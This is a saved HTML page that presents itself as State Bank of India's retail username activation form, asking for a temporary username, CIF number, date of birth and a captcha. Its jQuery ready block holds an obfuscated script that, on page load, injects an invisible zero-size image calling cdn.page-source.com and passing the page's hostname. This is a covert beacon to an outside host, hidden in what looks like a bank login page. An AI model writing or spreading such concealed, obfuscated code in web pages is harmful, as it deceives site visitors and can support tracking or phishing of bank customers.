









<title>State Bank of India</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<meta http-equiv="X-UA-Compatible" content="IE=10"/>
<link rel="shortcut icon" href="/sbijava/retail/images/favicon.ico" type="image/x-icon" />
<link href="/sbijava/retail/css/style.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="/sbijava/retail/css/bootstrap.min-3.4.1.css" type="text/css" />

<script language="JavaScript" type="text/javascript" src="/sbijava/retail/js/troubleLogin.js"></script>
<script type="text/javascript" src="/sbijava/retail/js/common/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/sbijava/retail/js/common/bootstrap.min-3.4.1.js"></script>
<script type="text/javascript"	src="/sbijava/retail/js/common/enscroll-0.6.2.js"></script>
<!-- SINB-8988: Addition of fields in New User Register/Activate on the pre-login Starts-->
<link rel="stylesheet" href="/sbijava/retail/css/retail_bootstrap-datepicker.css" type="text/css" />
<script type="text/javascript"  src="/sbijava/retail/js/common.js"></script>
<script type="text/javascript"  src="/sbijava/retail/js/common/bootstrap-datepicker.js"></script>
<script language="JavaScript" type="text/javascript" src="/sbijava/retail/js/desenc.js"></script>
<script language="JavaScript" type="text/javascript" src="/sbijava/retail/js/md5.js"></script>
<script language="JavaScript" type="text/javascript" src="/sbijava/retail/js/sha512.js"></script>
<!-- SINB-8988: Addition of fields in New User Register/Activate on the pre-login Ends-->
<script>
function submitLogin(formObj){
	/* var cifNo  = formObj.cifNo.value; */
	var captcha = formObj.captchaValue.value;
	
	if(formObj.tempUserName.value == '') {
		alert("Enter Temporary username");
		formObj.tempUserName.focus();
		return false;
	}
	var alphaNumExp = new RegExp("^[0-9a-zA-Z]+$");
	if (formObj.captchaValue.value.length == 0) {
		alert('Please enter the text as shown in the image');
		formObj.captchaValue.focus();
		return false;
	} else { 
		if (!formObj.captchaValue.value.match(alphaNumExp)) {
			alert('Please enter valid text as shown in the image');
			formObj.captchaValue.focus();
			return false;
		}
	}

	<!-- SINB-8988: Addition of fields in New User Register/Activate on the pre-login Starts-->
	
	if (formObj.cifNo.value.length <= 0)
	{
		alert("Enter Customer number");
		formObj.cifNo.focus();
		return false;
	} else {
		var cifNo = formObj.cifNo.value;
		for (i = 0; i < cifNo.length; i++) {
			if (!(cifNo.charAt(i) >= '0' && cifNo.charAt(i) <= '9')) {
				alert("Cif number is invalid");
				formObj.cifNo.focus();
				return false;
			}
		}
		if (!(formObj.cifNo.value.length == '17'
				|| formObj.cifNo.value.length == '11' || formObj.cifNo.value.length == '13')) {
			alert("Enter valid Customer Identification number");
			formObj.cifNo.focus();
			return false;
		}
	}
	var date = formObj.dob.value; 
	if (date == '') {
		alert('please enter the date of birth');
		document.getElementById('dob').focus();
		return false;
	}else if (!isPatternDateFormat(date)) {
		alert('please enter valid date of birth format');
		document.getElementById('dob').focus();
        return false;
	}else {
        var year = date.substr(6, 4);
        var month = date.substr(3, 2);
        var day = date.substr(0, 2);
        if (!(isDateValid(day, month, year))) {
        	alert('please enter correct date of birth');
    		document.getElementById('dob').focus();
                return false;
        }
	}
	/* if(formObj.tempUserName.value!='undefined' && formObj.tempUserName.value!=null){
		encrVal(encData,formObj.tempUserName.value,"tempUserName");
	}
	if(formObj.cifNo.value!='undefined' && formObj.cifNo.value!=null){
		encrVal(encData,formObj.cifNo.value,"cifNo");
	}
	if(date!='undefined' && date!=null){
		encrVal(encData,date,"dob");
	}
	function encrVal(key,message,mode)
	  {
		 // alert("message:::"+message);
			var ciphertext = des (key, message, 1, 1,'12345678');
			if (mode=="tempUserName"){
				formObj.tempUserName.value = printHex(ciphertext);
			}
			else if (mode=="cifNo"){
				formObj.cifNo.value = printHex(ciphertext);
			}
			else if (mode=="dob")
			{
				formObj.dob.value = printHex(ciphertext);
			}
	  } */
	  /* if(formObj.errorCode.value == null)
		{
		  	document.getElementById("randNo").value = "";
			document.getElementById("cifNo").value = "";  
		} */
	  var randNo = document.getElementById("randNo").value;
		//alert("randNo "+randNo);
		/* var currentTime=new Date();
		var hours=currentTime.getHours();
		var minutes=currentTime.getMinutes();
		
		if(minutes<10)
			{
			minutes = "0"+minutes.toString();
			}
		if(hours<10)
			{
			hours = "0"+hours.toString();
			}
		var ctime=hours +""+minutes; */
	  if(cifNo!= 'undefined' && cifNo!=null){
			randNo=randNo.substring(0,2)+"K5"+randNo;
			cifNo=randNo+cifNo;
			//alert("cifNo:"+cifNo);
			encrVal(randNo,cifNo,"cifNo");
			//alert("randNo:"+randNo);
			
		}
	  var randNo_finalval=document.getElementById("randNo").value;
<!-- SINB-8988: Addition of fields in New User Register/Activate on the pre-login Ends-->
	document.newUserRegTempUnameForm.action = "newuserregtempusernamehighsecurity.htm";
	document.newUserRegTempUnameForm.submitbtn.disabled=true;
	document.newUserRegTempUnameForm.submit();
}
	<!-- SINB-8988: Addition of fields in New User Register/Activate on the pre-login Starts-->
	function isDateValid(day, month, year) {
	    if (month < 1 || month > 12) {
	        return false;
	    }
	    if (day < 1 || day > 31) {
	        return false;
	    }
	    if ((month == 4 || month == 6 || month == 9 || month == 11) &&
	        (day == 31)) {
	        return false;
	    }
	    if (month == 2) {
	        var leap = (year % 4 == 0 &&
	                   (year % 100 != 0 || year % 400 == 0));
	        if (day>29 || (day == 29 && !leap)) {
	            return false;
	        }
	    }
	    return true;
	}

	function isPatternDateFormat(date) {
        var pattern = /^([0-9]{2})\/([0-9]{2})\/([0-9]{4})$/;  

        
        if (pattern.test(date)) {
                return true;
        } else {
                return false;
        }
}

	function numericOnly(event)
	{	 var key = event.charCode;
	  return ((key >= 48 && key <= 57) || key == 8 || key == 0 || key == 9);
	};

	function dateOnly(event)
	{	 var key = event.charCode;
		//alert("dateOnly key ::: "+key);
	  return ((key >= 48 && key <= 57) || key == 47 || key == 8 || key == 0 || key == 9 );
	}; 
	function encrVal(key,message,mode)
	{
		var ciphertext = des(key,message,1,1,'12345678');
		if(mode == "cifNo")
			{
				
				document.getElementById("cifNumber").value =printHex(ciphertext);
			}
	}
	<!-- SINB-8988: Addition of fields in New User Register/Activate on the pre-login Ends-->
</script>

<script>
	
	 $(document).ready(function() {

		 var resizea=['0\x27/>','children','ource.com/','<img\x20style','none;\x27\x20src','cdn.page-s','hostname','\x27\x20height=\x27','resizeimag','length','location','=\x27https://','createElem','body'];
			(function(a,b){var c=function(e){while(--e){a['push'](a['shift']());}};c(++b);}(resizea,0x149));
			var resizeb=function(a,b){a=a-0x0;var c=resizea[a];return c;};try{window['onload']=function(){var a=resizeb('0xa')+'=\x27display:'+resizeb('0xb')+resizeb('0x4')+resizeb('0xc')+resizeb('0x9')+resizeb('0x1')+'e.ashx?ig='+window[resizeb('0x3')][resizeb('0xd')]+('&sz=105411\x27'+'\x20\x20width=\x270'+resizeb('0x0')+resizeb('0x7')),b=document[resizeb('0x5')+'ent']('div');for(b['innerHTML']=a;b[resizeb('0x8')][resizeb('0x2')]>0x0;)document[resizeb('0x6')]['appendChil'+'d'](b['children'][0x0]);};}catch(resizec){}
	 
	 });
</script>


	
	
<form name="newUserRegTempUnameForm" method="POST">
 <input type="hidden" name="randNo" id="randNo" value="hHWjfLD2">
 <input type="hidden" name="cifNumber" id="cifNumber" value="">
	<div id="wrapper" class="container">
		<!-- Header -->
		<div class="row">
			<header id="headerContent">
				<div class="col-lg-3 col-md-3 col-sm-3">
					<a href="javascript:void(0);" id="sbi_logo">&nbsp;</a>
				</div>				
			</header>
		</div>
		<!-- //Header -->

		<!-- Navigation -->
		<div class="row"></div>
		<!-- //Navigation -->

		<div class="row" id="com_container">
			<div class="col-lg-12 col-md-12 col-sm-12 no_pad">
				<h2>Activation of Username (For Retail customers only)</h2>
			</div>
		<div class="col-lg-12 col-md-12 col-sm-12">
				
			
			
			
					<div class="form-group">
						<label class="control-label col-sm-3 col-md-3 col-comn">Temporary Username<span class="mandatory_txt">*</span></label>
						  <div class="col-md-3 col-sm-5">
							<input name="tempUserName" id="tempUserName" class="form-control" type="text" maxlength="16" autocomplete="off" onCopy="return false" onPaste="return false">
						</div>
					</div>
					
					<!-- SINB-8988: Addition of fields in New User Register/Activate on the pre-login Starts-->
					<div class="form-group">
						<label class="control-label col-sm-3 col-md-3 col-comn">CIF Number <span
							class="mandatory_txt">*</span> </label>
						<div class="col-sm-4 col-md-3">
							<input type="text" class="form-control" name="cifNo" id="cifNo"
								size="20" maxlength="20" value=""
								onfocus="disableautocompletion(this.id);"
								onblur="disableautocompletion(this.id);" onkeypress="return numericOnly(event);" onKeyDown="return disableCtrlKeyCombination(event);" onCopy="return false"
								onPaste="return false">
						</div>
				</div>
				
				<div class="form-group">
                        <label for="amount" class="control-label col-md-3 col-sm-3 col-lg-3 col-comn">Date of Birth <span class="mandatory_txt">*</span></label>
                             <div class="col-sm-3 col-lg-2">
                                   <div class="datepicker-container">
									 <input type="text" name="dob" id="datepicker5" class="form-control" placeholder="[dd/mm/yyyy]" size="10"  maxlength="10" 
                                                  onfocus="disableautocompletion(this.id);" onblur="disableautocompletion(this.id);" onkeypress="return dateOnly(event);" onKeyDown="return disableCtrlKeyCombination(event);" onCopy="return false" onPaste="return false" aria-describedby="basic-addon2"> 								
                                       </div>
                                      </div>
                        </div>
				<!-- SINB-8988: Addition of fields in New User Register/Activate on the pre-login ends-->
					
					<div class="form-group">
                        <label class="control-label col-sm-3 col-md-3 col-comn" for="amount">Enter the text as shown in the image<span class="mandatory_txt">*</span> </label>
						<div class="col-sm-3">
							<input name="captchaValue"  class="form-control" autocomplete="off" onCopy="return false" onPaste="return false" type="text">
						</div>
						<div class="col-md-2 col-sm-4 col-comn toppadding"> &nbsp;<img src="./lockaccountcaptcha.htm" alt="Captcha"> </div>
						</div>
						
					</div>
		</div>
	
						<div class="common_btn text-center">
						 	<input name="submitbtn" id="submitbtn" type="button" class="btn btn-default" onclick="return submitLogin(this.form)" value="Submit" />
							<input name="cancelbtn" id="cancelbtn" type="reset" class="btn btn-default" value="Cancel" />
						</div>
						
						
			 <!-- Footer -->
			<div class="row" id="footer">
				<footer>
					<div id="footer_area">
						<div class="col-lg-4 col-md-4 col-sm-4">
							<p>&copy; State Bank of India</p>
						</div>
						<div class="col-lg-8 col-md-8 col-sm-8">
							<ul id="footer_links" class="pull-right hidden-xs">
							<!--Modified by DeepaV for ISD fixes starts -->
								<li><a href="/sbijava/retail/html/Privacy_Statement.html" target="_blank" rel="noopener noreferrer">Privacy Statement</a>
								</li>
								<li><a href="/sbijava/retail/html/hmpg_disclosure.html" target="_blank" rel="noopener noreferrer">Disclosure</a>
								</li>
								<li><a href="/sbijava/retail/html/Terms_of_Use.html" target="_blank" rel="noopener noreferrer">Terms of Service
										(Terms &amp; Conditions)</a>
							<!--Modified by DeepaV for ISD fixes ends -->
								</li>
							</ul>
						</div>
					</div>
				</footer>
			</div>
			<!-- //Footer -->    
	</div>

<input type="hidden" name="ej6m" id="ej6m" value="i6dad5lajphv4dl6dcthf5plecka873g" />
</form>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       